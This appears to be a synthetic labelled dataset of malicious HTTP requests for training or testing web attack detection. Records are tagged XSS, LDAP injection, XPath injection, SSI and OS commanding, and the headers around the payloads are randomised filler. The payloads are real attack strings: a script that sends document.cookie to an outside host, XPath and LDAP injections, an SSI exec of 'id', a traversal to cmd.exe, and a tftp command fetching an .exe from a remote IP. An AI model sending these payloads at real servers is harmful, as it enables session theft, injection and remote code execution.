From: iaoHwaa@inosaaos.gov
If-Modified-Since: Wed, 19 Aug 09 13:49:09 GMT
If-Unmodified-Since: Sun, 27 Jun 04 20:53:02 UTC
If-Match: "8cXcLtZ.c8.37auyQ"
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic dXVnbmU6ZVpob0ppeg==
Authorization: Digest realm
Range: 6583-,350-4,-7502
Referer: http://To4OsIi.uk/bast/wieeuW/ueOlm/eO4irKae/eaogos.htm
TE: deflate
Trailer: Warning
User-Agent: Mozilla/9.1 (X11; U; Open BSD i386 6.3; ot-t9; rv:6.8.2) Gecko/16860386
UA-CPU: x86
UA-Disp: 119,1491,16
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 427x816
Via: HTTP/8.5 84.184.105.4, tiEx/2.7 243.14.254.23:7, lle/6.3 www.odrts4j.jpg
Transfer-Encoding: identity
Upgrade: omsS/1.9, atcm2/9.8, htuh6/0.3, roto/0.9, ttttRe/7.7
Warning: 211 5.85.253.98 "saoadsette" 
X-Forwarded-For: 233.230.195.96
X-Serial-Number: 94095568311644
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 38054
Start - Id: 48008
class: XSS
GET /olahahcOe/BJ/eOWpDvB1-KL7JmwQg./htougmPohspiLvhiaut4/dotxntet1oafcsd2ooov/rLbWHj2pADKAfUOCU6Si/sarDina7IdexIwor/thh/7thssib79im6zria/oeEeuYnaftleinoieaI.gif?4TEd=esyRkl+lozeE+wgeteo%7Cr&.Dopth=%3Cdiv+style+++%3D+++%22+background-image%3A++url%28javascript%3A+++%5Bdocument.location.replace+++%28%27http%3A%2F%2Fwww.etnt.com%2Fcgi-bin%2Ftoeticme.cgi%27%2Bdocument.cookie%29%3B%5D%29%3B+++++%22+++%3E HTTP/1.0
Host: 180.54.152.24
Connection: keep-alive
Accept: image/gif;q=0.1, video/*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: cwysone-0dnra8v, clrceol3-ob, 8iohsd-cnj, ab-6dp;q=0.2, o-sppsmnG2;q=0.8
Cache-Control: only-if-cached
Client-ip: 192.143.189.93
Cookie: 2oaai=imniostnsem;dZho=61818406;oOeootRo=5yi0hxmlsmceo)n7; n;6p1qaLel=234;kmTfd=&Ep
Cookie2: $Version="40"
Date: Fri, 03 Oct 08 04:37:27 UTC
ETag: "wpRitPdByMlsrTEbXjXz"
Expect: btagiam=frsp
From: n25cwrN@ae4ttib.uk
If-Modified-Since: Fri, 30 Apr 04 18:28:32 GMT
If-Unmodified-Since: Sat, 03 Mar 07 01:48:45 CET
If-Match: "uuuqI1XwtYZUwjgo"
If-None-Match: *
If-Range: Fri, 29 Aug 08 01:04:32 CET
Max-Forwards: 2
MIME-Version: 8.3
Pragma: n8rue5e=rkie
Proxy-Authorization: NTLM NnJhc2lkbGhldzBvZWFkcDRlYW5zdWVuaWF0c0xuaGdnZXBob28=
Authorization: Basic dG9vdTpzSHRuZ2U=
Range: 545-32,248-,104203-4203
Referer: /skeheflu/mni6.dll
TE: trailers,deflate;q=0.2,trailers
Trailer: User-Agent
User-Agent: cmtsi/1.1.9.4
UA-CPU: PowerPC
UA-Disp: 212,5646,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 948x768
Via: 4.1 www.tHyoonno.shtml:128, 0.9 www.stTtfns.shtml
Transfer-Encoding: gzip
Upgrade: mtenw/7.3, ootl0/6.0, ncmojI/8.6
Warning: 867 196.240.170.127 "obax" "Mon, 11 Jul 05 01:16:42 UTC"
X-Forwarded-For: 186.104.154.65
X-Serial-Number: 698729021
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48008
Start - Id: 38590
class: LdapInjection
GET /uG6wzXf@SPCKlzPsU6S/j3UrbFKOD/4g7BpD/tre9jo1nsoa/vMY@sIxPj4b/aatI25JxjC/lBPVTVGdqo7pZl/m3wtpeIzt/Vo6snsneAihsgtm/eFTh8/e7/shV3bss7a0n.n.C5k.js?odAp7aen=ial+&teruystm=oc%29%28%26%28objectClass+%3D++tNt*%29 HTTP/1.0
Host: www.eies0heha.de
Connection: keep-alive
Accept: application/*;q=0.6, text/*;q=0.1, audio/basic
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 228.134.231.111
Cookie: ny0uloro=eaetisndto2rtenn;oa6Ie1=2iB8_S;emya=1651213
Cookie2: $Version="7"
Date: Tue, 06 May 08 12:18:09 CET
ETag: "-JtG7_R7TXsAf9DYaiP"
Expect: 100-continue
From: erpfbp@n3i1grbt.st
If-Modified-Since: Thu, 29 Jan 04 05:22:33 CET
If-Unmodified-Since: Thu, 15 Jan 04 11:46:10 GMT
If-Match: *
If-None-Match: *
If-Range: "sxv3v.j2cwm90IEEQv"
Max-Forwards: 082
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="0Nnzylmx"
Authorization: Digest opaque="rseh"
Range: -348176
Referer: http://www.qdelsbt.com/Nyhsu/6oOtR/sbmu/tdbaceEm/Eoc3ya.txt
TE: trailers,trailers,deflate
Trailer: If-Range
User-Agent: Mozilla/9.0 (Machintosh; U; PPC 5.9; tr-le; rv:7.4.9) Gecko/84688124
UA-CPU: 68000
UA-Disp: 9162,3647,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7804x6342
Via: FTP/2.3 209.176.240.142
Transfer-Encoding: compress
Upgrade: teh/3.7, eErn/1.4, yrgp42/8.0, 3Ets/1.6
Warning: 494 www.yte1Tn.shtml "iewe" 
X-Forwarded-For: 157.225.217.71
X-Serial-Number: 379109696738614
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38590
Start - Id: 50041
class: XPathInjection
POST /EGE/mUtbnoYddSPbTDfIW7/eac-cC1_LarfLARQX/ija@7_iKB/6hVd6@a8@krxRUyxt/n1nbma3nsQ_of/eCscwvfssyord7/aN4JtO-T/iI455ta/hjQiH./6syBkM8IDtl7Rzc/s9-m2ljyKWao3CzY.mspx? HTTP/1.1
Content-Length: 157
Content-Language: arb,Ieyzet,Xiiota
Content-Encoding: deflate
Content-Location: /ignome/hxA4/eeue.jpg
Content-MD5: cmVlZmpvYWExaDZlb3d0ZA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 14 Sep 08 01:46:07 CET
Last-Modified: Mon, 12 Jan 09 19:54:17 CET
Host: 150.229.106.175
Connection: close
Accept: */*;q=0.8
Accept-Charset: x-mac-hebrew, euc-jp;q=0.2, x-mac-greek, iso-8859-2, windows-1252;q=0.3
Accept-Encoding: *;q=0.7
Accept-Language: cs' or    count(   path/child::node()[position(    )=(( i + j    +   k+l+ 1)] |    path/child::*()[position()=(k+1)])=1  or    'nceu'    =' m8'   or
Cache-Control: no-store
Cookie: f88bodyuEvv-=)fltpiesf;bonerrEms9t=-@ira ;lkWeid=24939163;vmey=znM;Wdsnenpphfooca=oaa
Cookie2: $Version="358"
Date: Wed, 10 Feb 10 22:13:38 GMT
Expect: 100-continue
If-Modified-Since: Sun, 16 May 04 19:49:18 GMT
If-Unmodified-Since: Sat, 09 Aug 08 12:15:49 UTC
If-Match: "rOK5SZ-PNn7M8H.SVKz1"
If-None-Match: "pX8p4WY8Fy8gf1M-nSFX"
If-Range: "Rkm-Yg38f89@cLIx8kc"
Max-Forwards: 26
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: Digest username="jlor"
Authorization: Basic bXBqWG10OjlhM3N6
Referer: http://www.onwsct.biz/nlnzent/khqHsdlY/si8ua/iksas.css
TE: trailers,trailers,trailers
User-Agent: q8blGYxLfn http://www.nnzoybb.gov
UA-CPU: MIPS
UA-OS: Solaris
UA-Pixels: 3289x0027
Via: 4.1 67.66.49.137
Transfer-Encoding: gzip
Upgrade: 4AnI/4.6, Mi0vm/0.4, aaabch/0.4, e9ei5t/7.3
Warning: 208 108.120.139.200:1524 "26uiheq0aoeie" 
X-Forwarded-For: 5.28.189.137
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

hth2Eg=servicesr%uRultya&kQQa30xJis=dse6y I&d4o=a 5 hosaoeo8inh&n5nthbzt4cal5t=0ruepeturivsst&kaiR07ah=55613718&rhe=nbexo8ouv&1bfasprastetzf=5853&sSl0j='

End - Id: 50041
Start - Id: 35853
class: XPathInjection
GET /e60/sytcNzajrNi7e/cto2eheEobLseaezs/O4qye3mNsHvm/ykiV3T/ixrt.Tzhv8Xo./vT0w5E/pyoredlhtfdy9Frihg/tOvr5Pbx2WiaajaIwGK/yH2m/mnJYeWFp7RgLWS54GhkJ.exe?ota=jhfmtnsIeo2h&hpoweE=iezeeyciatfy&qI.TGMvbscriptYMG=943&exlhdHt4odne=c9lmarsf&ocje2h=bTVncn&eynu3cs3ijse0=082&v.B_TDZ7V=e7B&it=4&aaEeaiTbdea6E=rswdr9%2Fn5t%2Futln%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3D69%5D++++or++%27zrsa%27+++%3D++++%27&ps8eSt7hQ37_=eoftptyme%26rlAr HTTP/1.1
Host: www.xyoe.com:97
Connection: dK4oeEgt
Accept: video/quicktime, text/xml;q=0.5, image/jpeg
Accept-Charset: koi8
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: max-stale
Client-ip: 177.161.53.181
Cookie: roshst=ddhPeuuf'ara8;bvt=tuWeh;lPhdea=1243929390
Cookie2: $Version="3"
Date: Wed, 03 Nov 04 13:56:57 CET
ETag: "bhOsZQ9I08QZQJM3GB.5"
Expect: iasENO
From: dtisuok@sicpmn.gov
If-Modified-Since: Mon, 19 Oct 09 08:26:54 GMT
If-Unmodified-Since: Tue, 22 Feb 05 16:28:09 GMT
If-Match: *
If-None-Match: *
If-Range: "IG_M2_TjEnRTmPZq737_"
Max-Forwards: 06
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Digest username="ioula3"
Authorization: Digest realm
Range: -15
Referer: http://www.zehinamt.cz/I5jv/HboT.fgf
TE: trailers,trailers
Trailer: Authorization
User-Agent: bralao1o (7YCo_KC-)
UA-CPU: PowerPC
UA-Disp: 747,476,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 4135x5853
Via: HTTP/5.6 www.tct9dpg.gif
Transfer-Encoding: identity
Upgrade: ei2y/3.0
Warning: 610 www.24teifwn.png "Opivct0gaEd" 
X-Forwarded-For: 43.11.206.228
X-Serial-Number: 83889853145892267537
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35853
Start - Id: 39389
class: SSI
GET /ns3leitsryuewNliH/3kXVcYfxssf/S.nullj9nullsqh3/o5A/UOCV76kWC/tooaoeecOjxte/htaccesLNV0ahttp-j/fktD8nh/rutQzq/Vaa/yOpMzkispk7/Xniae.gif?Baccess_lognLX5.C7L4X=246315&dfgWknme9una=usrymupdatey&5dNIqRvT1KP=uocsmt8ru8anoliar&ogertee4erody=%3C%21--%23echo+var%3D%22date_gmt%22--%3E HTTP/1.0
Host: www.stFsrEtoau.cz
Connection: close
Accept: audio/x-wav
Accept-Charset: gb2312;q=0.5, x-mac-roman, euc-jp, euc-kr
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=41908
Client-ip: 242.172.212.87
Cookie: ThoydzEne59R=0774;alauccrrboaes=dUc;hi=+HRl;siLwprEsrhno5f=449;PrUF=ioc1
Cookie2: $Version="42"
Date: Tue, 22 Nov 05 08:34:11 CET
ETag: "lDDdeICjGfQ3NK@NFBX"
Expect: bnehhbgf
From: lece@srdgy.org
If-Modified-Since: Wed, 30 Nov 05 18:41:36 GMT
If-Unmodified-Since: Mon, 17 Sep 07 08:57:05 GMT
If-Match: *
If-None-Match: "XP6jmz6LsW7qWx7x-VR"
If-Range: "gYPgOcd-KW77hXir"
Max-Forwards: 4
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: reenr ueer=altyt2
Authorization: NTLM bGVhcmlubmhjb0FGclNkc3VlZXRlZG10Y05zM3Rsd2VOdDVybQ==
Range: -7403,569103-
Referer: http://www.wBnr.de/u3swlto/f0tdR/hoeisp/tlsbgnYe.exe
TE: gzip,trailers,chunked
Trailer: Range
User-Agent: Mozilla/4.1 (X11; U; Linux i586 8.3; Tj-fr; rv:3.0.6) Gecko/43342322
UA-CPU: x86
UA-Disp: 939,8855,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 696x8409
Via: 0.2 124.162.206.142, 8te/4.0 www.to9hhxn.shtml, 8.2 www.ei5nemn.shtml
Transfer-Encoding: moig
Upgrade: Trtet/1.3, sieet/3.4, eced/6.6, yns/9.1, snfH/3.3
Warning: 436 www.siscd.jpeg "oiebdEomsriX" 
X-Forwarded-For: 98.145.13.52
X-Serial-Number: 3967259354
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39389
Start - Id: 39119
class: LdapInjection
PUT /nK1QZK_mBEdckNT/p5Isedn2biedeclm/fohttoDGs/9Es/gz/iNCbLfIsBflGO7dEc/f8a4uv89g3ightetts/f9slo/qQ-VfS2s8xCbBICDdbn/_4UH.sh? HTTP/1.0
Content-Length: 262
Content-Language: IleiP,Ticmesm
Content-Encoding: identity
Content-Location: /kegEdae/s67eitp/ahoa/ziasjd7/ryiq.wmn
Content-MD5: YWV0ZHVyZXlFbHNickVhbw==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 14 Jul 04 06:01:09 CET
Last-Modified: Thu, 02 Jul 09 21:23:08 CET
Host: www.ogsRw60iro.st:80
Connection: hdal
Accept: */*
Accept-Charset: x-mac-roman;q=0.2, isiri-3342, euc-cn, big5;q=0.1, x-mac-japanese
Accept-Encoding: 
Accept-Language: ay-antwrenx;q=0.4
Cache-Control: no-cache
Client-ip: 188.4.183.10
Cookie: sflisSmicdetuO=y;FpRallSfj6iH=lVRM@lpC5S0;istnrhdtpte5aaE=wlRe)(|   (mTHst=*);7BoAh=ces;ebw9birsttrO=5766500504
Cookie2: $Version="38"
Date: Sat, 30 Dec 06 18:19:26 UTC
ETag: "vklQ5.RWVlaeer0rQ81"
Expect: oygkxg=dhdio
From: odttunS@5IalqSfc.de
If-Modified-Since: Sat, 31 Jan 09 20:53:51 UTC
If-Unmodified-Since: Mon, 22 Mar 04 04:40:16 UTC
If-Match: "rbEmtHriFu3e9kRvm@X"
If-None-Match: *
If-Range: Sat, 20 Nov 04 16:47:44 CET
Max-Forwards: 0
Pragma: ncbfn='rstomor'
Authorization: NTLM aTRFZWVhZXNoaXNqc2lzbWVsb3Rvb3FzYnJOaVB0ZWF0dXl0eQ==
Range: 5877-,7565-
Referer: /sheetcw/guwwjseN/ordcoo/qirm.gz
TE: chunked;q=0.2,deflate
Trailer: Upgrade
User-Agent: Mozilla/0.7 (Machintosh; U; PPC 6.8; 0d-tk; rv:4.4.6) Gecko/22633819
UA-CPU: Sparc
UA-Color: color8
UA-Pixels: 7687x288
Via: FTP/4.2 22.216.185.184
Upgrade: sr7e/6.7, dws/7.9, eeniI/2.5, q4ce/2.8, acna/1.5
X-Forwarded-For: 83.44.70.121
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

par=includeDbgsounddooo(replacenEa&obypzaoteRdid=Ea4=earv)sE&UhoFOOOkEM= CrmstAtr&dne5iltlnend=85&EioirrTe=su5r&edt=3mz&nhre=WobjecteamnstSbEdn&eEhuti0h9=16&e158p9=386&uhpxRYqJqB=sc&ai8MRq3l=21681006&eesne=usb&4home@5dlink=nwh&mioieAdcz3o=6&abagH=ae91rNwNC

End - Id: 39119
Start - Id: 50063
class: XPathInjection
PUT /tdzyeanstoaf/GiesZSgqZc0idlVJ/GC/eixshrmsn7eiskde.asmx? HTTP/1.0
Content-Length: 169
Content-Language: eer
Content-Encoding: gzip
Content-Location: /yswmxna/ssnao/eoaces.tiff
Content-MD5: dWU5SXdoZW1yZ25tdDBzaw==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 24 Apr 07 24:13:23 UTC
Last-Modified: Sun, 27 Jan 08 18:23:43 CET
Host: 225.224.49.99
Connection: keep-alive
Accept: text/html
Accept-Charset: iso-8859-9, macintosh, euc-jp
Accept-Encoding: *
Accept-Language: thbhrA-daise
Cache-Control: only-if-cached
Client-ip: 78.20.93.165
Cookie: itot7sF=66404;tsetcjtfwbnuRh=dpm'   or    count(  path/child::node()[position( )=((i+   j   +   k+    l   +1)]    |   path/child::*()[position()=(k+1)])=1 or 'aekCg'  =    '   cbse'   or;ii6OthyeaI=ehhht
Cookie2: $Version="188"
Date: Tue, 16 Sep 08 17:44:28 GMT
ETag: "_-1U-eV7HjLd643dy"
Expect: 100-continue
From: zilj@eJseheh.st
If-Modified-Since: Sun, 30 Sep 07 08:39:45 GMT
If-Unmodified-Since: Thu, 12 Oct 06 19:52:32 UTC
If-Match: "4e4yTPA28OcvJLv5BU"
If-None-Match: "5pjPmGizVNiaTxYD7GX"
If-Range: "N3937bND1tL.rVM2u"
Max-Forwards: 4
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic ZWVpZmluYTpybnJydDJlbw==
Authorization: Basic ZWNzYWU6UnRwM3Q=
Range: 68-,-66180,-89
Referer: /vhhFeo.swf
TE: trailers,trailers,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/9.8 (compatible; MSIE 3.2; Linux i586; nIofjaom)
UA-CPU: MIPS
UA-Disp: 086,0919,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 3705x532
Via: 9.9 www.thfO.jpeg, FTP/2.7 123.98.110.203
Transfer-Encoding: ellnh
Upgrade: seeim/7.5, eeEad/9.1, noaakN/7.4, uat/4.4, Shme/3.3
Warning: 633 118.107.47.29 "ehmrqron" "Sun, 16 Apr 06 02:34:14 GMT"
X-Forwarded-For: 18.212.91.180
X-Serial-Number: 34243313236496
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Ulcg0rg1ruh=dy&De=wel4&tseujtyye=gshEr&tanx9n7ison=brS3&nHf5oece=Elyr&32t7e='a&2xahtY5pp5hs=ielhd&itrsg2jj6ing=eHnRenall]ntoestl&tMPgaT=s&Bhttpeq mL+1xscripthnxM

End - Id: 50063
Start - Id: 49084
class: XPathInjection
GET /vNv4W/iEwRXDP8/ye0ct9zfono/L2cDnullbwb9GTwhR.cfm?_E@W=3Otaw%5Cn&08cz@f_0YZunion=c7a%27++++or++++1%3C+tfheo6%2Fi%2Fple1r%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D379%5D+++++or+++++%272Ip%27++%3D++%27&e2eewOndnesoeH=03049 HTTP/1.1
Host: 134.25.195.35
Connection: close
Accept: text/plain
Accept-Charset: *;q=0.8
Accept-Encoding: compress, compress;q=0.5, compress;q=0.6
Accept-Language: *
Cache-Control: min-fresh=66324
Client-ip: 111.104.86.65
Cookie: 56i=afg;eae4Ieiea1ttwto=5entrioRuiyotjni;peatocck=hfi_8Z_y
Cookie2: $Version="1"
Date: Mon, 30 Mar 09 23:36:08 UTC
ETag: W/"qnDBCfbZuKmSGx_h3.Q."
Expect: 100-continue
From: eynba@e3yzoc.com
If-Modified-Since: Wed, 10 May 06 15:03:51 GMT
If-Unmodified-Since: Fri, 08 Apr 05 16:50:47 GMT
If-Match: *
If-None-Match: *
If-Range: "d0f0VF0rTPq0r9j5lP"
Max-Forwards: 0
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Digest username="tlens"
Authorization: NTLM ZGVtdTV5dGR0ZVJvaXptc3JyN2hpb3doZTZvT2liYXVl
Range: -39415,-80233
Referer: http://lot6kdy.fr/juoe8r/teu3kov/tiL3.tar.gz
TE: trailers
Trailer: Date
User-Agent: e2o2kA/6.6
UA-CPU: x86
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7313x7197
Via: 7.6 www.goib.tiff
Transfer-Encoding: deflate
Upgrade: eecgo/9.8, alfajh/4.4
Warning: 032 www.mhnSre.js "nIcaleerr" "Sat, 08 Jan 05 06:49:45 UTC"
X-Forwarded-For: 43.74.174.24
X-Serial-Number: 7433292
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49084
Start - Id: 40041
class: SSI
GET /ewwoyDeKdoqenasfh.asp?xftv680tnozo=eanetcatdt&mteH=r6usr&aeaiyUd1dhnoe=atinsert8saveehi5kuSdropi&rewZtdr=t_.%40&eduftDeudgada=839960&sEen=%3C%21+%23%3C%21--+++%23exec++++cmd%3D%22id%22--%3E&ewbtaysapw=eioaxeemr55ktam&esHs=bx1GRpJm&d6tiCqu=eaqrsleaeUoo HTTP/1.1
Host: www.2styG.ch
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: windows-1250;q=0.7, x-mac-roman;q=0.3, iso-2022-kr;q=0.8, iso-8859-8, x-mac-arabic;q=0.7
Accept-Encoding: *
Accept-Language: Tnie0qgq-edeEe4, nirhhRyh-iE;q=0.8, ntza-nt, lh5anta-tibess;q=0.3
Cache-Control: max-age=07
Client-ip: 175.76.182.91
Cookie: nnootrdztsbynMM=8416739662;fnE_sK_Qpe=tS]nigietttl
Cookie2: $Version="7"
Date: Sun, 19 Mar 06 18:00:45 UTC
ETag: "xJcfFu.TQv6CMJdq7b"
Expect: 100-continue
From: loaa@ioendeSshb.it
If-Modified-Since: Sun, 11 Sep 05 17:46:44 CET
If-Unmodified-Since: Thu, 25 Oct 07 19:23:18 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 04 Sep 08 10:03:53 UTC
Max-Forwards: 402
MIME-Version: 7.2
Pragma: botele3y='v'
Proxy-Authorization: Digest username="tsbedo"
Authorization: Digest realm
Range: 04250-19296
Referer: /btadts1l/sInd2.cgi
TE: trailers
Trailer: If-Range
User-Agent: Mozilla/1.0 (Machintosh; U; PPC 6.7; n5-b8; rv:3.6.4) Gecko/92731498
UA-CPU: MIPS
UA-Disp: 704,609,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 5394x1347
Via: 3.0 www.aUne.jpeg:1310
Transfer-Encoding: oretoe
Upgrade: sonW0n/7.4, iecird/0.5, sihan/2.9
Warning: 794 212.70.161.46 "nC7teHarp0di5fna" 
X-Forwarded-For: 117.150.72.121
X-Serial-Number: 02001
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40041
Start - Id: 44169
class: OsCommanding
GET /msadc/..���../..���../..���../winnt/system32/cmd.exe?/c+ HTTP/1.1
Host: www.tCube.gov
Connection: keep-alive
Accept: image/png, application/rtf, audio/x-wav
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: tzbfas1-eoI1, c-wlei;q=0.0, vty8-dDeh1ls;q=0.3
Cache-Control: min-fresh=321
Client-ip: 21.12.224.178
Cookie: tmeta50document4G-6=pix_pxXbLf-;dVWmLPwB=3897805590;meiDtaw=)
Cookie2: $Version="0"
Date: Sun, 08 Oct 06 01:33:48 CET
ETag: W/"aTOdrmXsUZHyRCr-F"
Expect: d5etln=atx6G
From: ejtot@nhhlptpni.net
If-Modified-Since: Wed, 16 Apr 08 16:49:15 GMT
If-Unmodified-Since: Mon, 09 Jun 08 23:20:40 GMT
If-Match: *
If-None-Match: "nNZaNQElM_xY-TcR3F92"
If-Range: *
Max-Forwards: 4163
MIME-Version: 3.5
Pragma: ots='4cruil'
Proxy-Authorization: Digest response="588D5566B01CAeB4251C23B5AbBA4929"
Authorization: e8aie hagD=reidhsdm
Range: 13627-239
Referer: /tl7aq6/7s4Hco5/sseraf/hwNodd2.tar.gz
TE: gzip
Trailer: If-None-Match
User-Agent: Mozilla/1.1 (Machintosh; U; Mac OS X 0.4; 7e-te; rv:7.5.5) Gecko/43191844
UA-CPU: Sparc
UA-Disp: 0908,917,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 884x0554
Via: s28on/0.7 www.nd6r.jpg, FTP/1.5 13.170.144.160, 4.7 www.Mcdc.html
Transfer-Encoding: compress
Upgrade: elepej/6.1, assl/9.6, tHws/5.5
Warning: 582 219.244.0.242 "hesneeTg" "Fri, 08 May 09 19:31:58 UTC"
X-Forwarded-For: 195.218.223.142
X-Serial-Number: 386658457153334430
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44169
Start - Id: 43184
class: OsCommanding
GET /tri7us/pdkaJ/holvFEhXaxd-9VMd6RS/zPwy/r@JXs_JiyZ/pe3/cV5Pak5dtTSNi@aZwgmq/gigil8o3p/nmts34gJ2/tvTr/rcl.png?uwxlonrr=t+mochavtes8e+&f9r2otz=tftp+-c+++++get+++++89.122.242.186%3A%2Fnele%2Fstri.exe+++++%7C&.NTyXUkn=191451&dops7yraNeayit=35677&bnvoeweoehTgno=415949669&olwemrnhtyeu=inZ7yH2x&eaieeejr=nsVctiSra6toiee&OieaoA7=iRd3AXnJXz0&OUnMwinntF0zxp_4=2uqnof4haeieta HTTP/1.1
Host: 184.151.92.229
Connection: s0tooFo
Accept: */*
Accept-Charset: koi8-r, windows-1253, iso-8859-15, iso-2022-kr;q=0.1, koi8-r
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: gtt=eicHosE
Client-ip: 177.135.197.204
Cookie: satvefyiiu9o=725510;oWJX=?l5bgalle7sru)aHl8tt8;_g7WX=508;zahjwtaditEal=dgmEEab5;d8q=2760;exeAg=udocumentk2o4iluhpassthru
Cookie2: $Version="8"
Date: Sat, 21 Mar 09 01:08:05 UTC
ETag: "3n7cYjzbN.STqhi"
Expect: dyewmaae=oUdqj
From: 9aythl@Osdt.st
If-Modified-Since: Sun, 26 Apr 09 18:12:49 GMT
If-Unmodified-Since: Thu, 18 Sep 08 18:08:11 GMT
If-Match: *
If-None-Match: "t5Noiu8MlNn9wkv3"
If-Range: Sun, 24 Sep 06 12:14:53 UTC
Max-Forwards: 0285
MIME-Version: 6.0
Pragma: esr='1taw'
Proxy-Authorization: 3ndn s8tn=stem
Authorization: Digest cnonce="hTsS"
Range: 332370-1588,656-95
Referer: /lcyeeace/turHe.sh
TE: deflate;q=0.9,trailers
Trailer: Pragma
User-Agent: eeqadOlEAld
UA-CPU: StrongARM
UA-Disp: 1503,1276,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 953x846
Via: FTP/1.4 www.roriN4.css, 5.1 248.22.29.195, dxnten/1.9 32.1.7.129
Transfer-Encoding: compress
Upgrade: ehu/7.5, lem/4.9, eney/6.2, rTm/6.8, lfh/2.5
Warning: 306 www.gnulF0h.html "etlXa" "Wed, 08 Aug 07 07:40:17 GMT"
X-Forwarded-For: 179.224.81.249
X-Serial-Number: 5739795926736555
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43184
Start - Id: 39300
class: SSI
GET /gobr7sApehmmt6nifimC/eassegrzlisjqemsnmTc/fmkWlupIeWf/ooso8i/HUGwp-@NYIbtzIsFT/tsoOok/ww6-y._Y/aoe2ih1uleWmow2ozae.jsp?bdpdxedn9tch=xkSn&Q5Z3noM=%3C%21--%23echo+var%3D%22date_gmt%22--%3E&YwMq2libAg@_=Rsetctts&ehreyN=72&ycbeesohscme=eo&0BautoexecevRfhttpb4=436894&ecotnla=il HTTP/1.0
Host: 18.184.206.5:80
Connection: close
Accept: */*;q=0.1
Accept-Charset: x-mac-roman;q=0.2, iso-8859-7;q=0.3, euc-kr;q=0.2
Accept-Encoding: 
Accept-Language: dn-ERh, fye-7eOsrOm;q=0.6, Osnhu-h;q=0.6
Cache-Control: max-age=9507
Client-ip: 178.60.27.113
Cookie: e5htnbH1erD5=3390562100;io=9;chniwebXrn8=7;gndAfine=74
Cookie2: $Version="27"
Date: Sat, 06 Oct 07 18:49:03 UTC
ETag: W/"jsr.W0L@rVg50t8d"
Expect: iGetlsru
From: unmiie@Hyivtsn.com
If-Modified-Since: Thu, 31 Jan 08 11:47:45 GMT
If-Unmodified-Since: Mon, 02 Nov 09 15:50:31 CET
If-Match: *
If-None-Match: "vQH4RvlWOIqenGpkp"
If-Range: *
Max-Forwards: 8
MIME-Version: 6.8
Pragma: acendteT='aazbwoa4'
Proxy-Authorization: Basic N3NzZ21vbG86bnUzaQ==
Authorization: NTLM ZWhlbGFvaW5xZWpodHluaWFldW9tZWVPaW5wRXJoNGxHdHRqbnNhYTk=
Range: 9225-57239,301-8
Referer: http://www.dEra.be/dhyemY4t/msgki/itrhc.wav
TE: trailers,deflate;q=0.6
Trailer: Expect
User-Agent: q6Nrts/0.9.1.1
UA-CPU: MIPS
UA-Disp: 646,7509,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 573x190
Via: 6.1 209.225.112.43, 6.8 www.ytmo.tiff
Transfer-Encoding: ks2h1; sdgoons=srt4ty
Upgrade: asiM/9.3
Warning: 946 74.67.255.112 "graknmaJmdafxne6c" 
X-Forwarded-For: 229.251.127.187
X-Serial-Number: 80952053828136219
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39300
Start - Id: 38201
class: LdapInjection
